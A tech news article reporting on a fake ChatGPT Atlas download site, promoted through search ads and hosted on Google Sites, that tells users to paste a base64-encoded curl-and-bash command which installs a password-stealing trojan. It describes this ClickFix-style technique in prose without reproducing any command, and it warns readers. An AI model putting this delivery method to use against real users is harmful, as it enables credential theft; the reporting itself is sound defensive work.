A new scam is making the rounds online, and this time it’s masquerading as the ChatGPT Atlas browser. Security researchers are warning users to be careful after spotting a convincing fake version promoted through search ads—one that looks legitimate at first glance but is designed to steal your account data.
The warning comes from research firm Fable. The fake browser isn’t using any sophisticated exploits. Instead, it relies on tricking people who assume anything that looks polished and appears at the top of search results must be safe.
The setup is simple. A search ad appears promising a download of “ChatGPT Atlas,” complete with branding that matches the real thing. Clicking on the link takes you to a website that looks nearly identical to the official one. The layout, the wording, even the design cues are copied almost perfectly. But there’s one major giveaway: the site is actually hosted on Google Sites. According to Fable, scammers often clone legitimate pages using tools like v0.dev, then deploy them on Google’s hosting platform to give the illusion of trustworthiness—especially for users who associate “Google” with safety.
Things get shady the moment you try to download the app. Instead of offering a normal installer file, the site tells users to paste a command into their terminal. Anyone even slightly tech-savvy would recognize this as a massive red flag. But for people who aren’t familiar with the feature, it might look like a harmless setup step.
The command itself is disguised as a base64-encoded string that gets decoded and executed through curl and bash. Once it runs, the malware pops up a request asking for your administrator password. If the user enters it, the trojan gains full sudo privileges and immediately installs a second-stage payload. From that point on, the attacker can scrape stored browser passwords, account logins, and other sensitive data.
This tactic is essentially a twist on the known “ClickFix” attack method. Nothing here is technically advanced—it’s almost shockingly simple. But it works because it leans heavily on social engineering: people trust familiar brands, trust search ads, and trust anything that looks clean and official. And that’s exactly what the attackers are banking on.
The takeaway is clear: if a website ever tells you to paste a terminal command to install something, stop right there. Always double-check the domain, and only download apps from verified sources.
Don’t miss a thing! Join our Telegram community for instant updates and grab our free daily newsletter for the best tech stories!
For more daily updates, please visit our News Section.
(Via)
Comments